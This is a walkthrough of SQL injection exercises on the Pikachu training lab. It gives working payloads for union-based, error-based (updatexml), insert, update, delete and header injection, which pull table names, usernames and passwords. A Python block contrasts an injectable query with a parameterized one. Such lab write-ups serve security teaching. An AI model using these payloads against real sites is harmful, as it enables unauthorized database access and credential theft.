Numeric SQL injection (POST type):
First enter 1:
Because it is POST type, capture the request and change the parameter to an always-true condition:
id=1 or 1=1
As you can see, the page returns all the data.
Character SQL injection (GET type):
Direct input:
Character injection requires closing the quote in the SQL statement first and then adding an always-true condition; this returns all the data:
kobe' or 1=1 #
Search injection:
Try searching for the letter k:
View the source code:
Here you can see the search SQL statement: select username,id,email from member where username like '%$name%'
Similarly, close the SQL statement and add the condition: k%' or 1=1 #
All the data is returned:
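As an added defender-side example (not code from the original walkthrough or from Pikachu itself), the search query shown above rebuilt on an in-memory SQLite table in Python, so the injectable string concatenation can be compared with a parameterized query; the member table and its rows are constructed here, and because SQLite has no `#` comment, the search payload is written in the comment-free `... or '` closing form the page uses in its insert and update sections. The numeric id lookup from the first lab is included the same way.

```python
import sqlite3

# Constructed sample data: the same column layout as the lab's member table.
SCHEMA = ("create table member (id integer primary key, username text, pw text,"
          " sex integer, phonenum text, email text, address text)")
ROWS = [
    (1, "vince", "p1", 1, "111", "vince@example.invalid", "a"),
    (2, "allen", "p2", 1, "222", "allen@example.invalid", "b"),
    (3, "kobe", "p3", 1, "333", "kobe@example.invalid", "c"),
]

def new_db():
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    con.executemany("insert into member values (?,?,?,?,?,?,?)", ROWS)
    return con

def search_vulnerable(con, name):
    # Same shape as the lab's query: the input is spliced into the SQL text,
    # so a quote in it ends the literal and the rest is parsed as SQL.
    sql = f"select username,id,email from member where username like '%{name}%'"
    return con.execute(sql).fetchall()

def search_safe(con, name):
    # The placeholder binds the whole input as one value; the wildcards are
    # added to the value, not to the SQL text, so quotes stay data.
    sql = "select username,id,email from member where username like ?"
    return con.execute(sql, ("%" + name + "%",)).fetchall()

def lookup_vulnerable(con, id_value):
    # Numeric variant (first lab): no quotes, so "1 or 1=1" needs no closing.
    sql = f"select username,id,email from member where id={id_value}"
    return con.execute(sql).fetchall()

def lookup_safe(con, id_value):
    # Reject non-integer input before it gets near the query, then bind it.
    if not str(id_value).isdigit():
        return []
    sql = "select username,id,email from member where id=?"
    return con.execute(sql, (int(id_value),)).fetchall()

if __name__ == "__main__":
    db = new_db()
    # SQLite has no '#' comment, so the page's search payload is written in
    # the comment-free closing form used in its insert/update sections.
    payload = "k%' or 1=1 or '"
    print(len(search_vulnerable(db, payload)), "rows from the injectable query")
    print(len(search_safe(db, payload)), "rows from the parameterized query")
    print(len(lookup_vulnerable(db, "1 or 1=1")), "rows from id=1 or 1=1")
    print(len(lookup_safe(db, "1 or 1=1")), "rows after validation + binding")
```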
XX-type injection:
The way the input is wrapped is different: a') or 1=1 #
(Union injection, using the previous type as the example)
Determine the number of columns: a') order by 3 #
a') order by 2#
This shows the number of columns is 2.
Then use a union query to get the database name: pikachu
a') union select database(),2#
Query the tables in the database:
x') union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#
Query the column names in the users table:
x') union select table_name,column_name from information_schema.columns where table_name='users'#
Union query to get the usernames and passwords: a') union select username,password from users #
Error-based injection:
Condition: the backend does not suppress its error messages.
Common functions: updatexml(), extractvalue(), floor()
The other steps are omitted (the payload can be adapted from the ones above). Getting the username and password directly:
k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1)#
insert injection:
The insert-type SQL statement: insert into member (username,pw,sex,phonenum,email,address) values('hzk','123456',1,123,123,123);
In one of the required fields of the insert form: hzk' or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
The other steps are the same; just copy the payload.
update injection:
Log in first, then enter the statement directly in the edit-information field; the payload is the same as for insert:
hzk' or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
This yields the username and password.
delete-type injection:
Capture the request when deleting:
The backend deletes by id; send the request to Repeater and modify it:
id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1)
Because it is in the URL, it needs to be URL-encoded:
This yields the username and password.
HTTP header injection:
After logging in, the page is seen to read the request headers, so injection may be possible.
Capture the request:
Modify the User-Agent or Cookie to perform the injection:
firefox'or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
This yields the username and password.